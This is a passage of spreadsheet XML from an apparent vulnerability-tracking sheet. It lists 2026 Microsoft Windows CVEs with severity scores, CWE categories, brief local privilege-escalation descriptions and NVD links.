      <c r="Q869" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K87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70" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr"/>
      <c r="Q870" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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71" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr"/>
      <c r="Q871" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr"/>
      <c r="Q872" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K87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73" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr"/>
      <c r="Q873" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr"/>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr"/>
      <c r="Q874" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R874" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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75" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr"/>
      <c r="Q875" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R875" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr"/>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr"/>
      <c r="Q876" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr"/>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr"/>
      <c r="Q877" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr"/>
      <c r="Q878" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr"/>
      <c r="Q879" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr"/>
      <c r="Q880" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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1" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr"/>
      <c r="Q881" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr"/>
      <c r="Q882" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K88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3" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr"/>
      <c r="Q883" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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84" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr"/>
      <c r="Q884" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr"/>
      <c r="Q885" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="D886" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr"/>
      <c r="Q886" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69731</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr"/>
      <c r="Q887" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
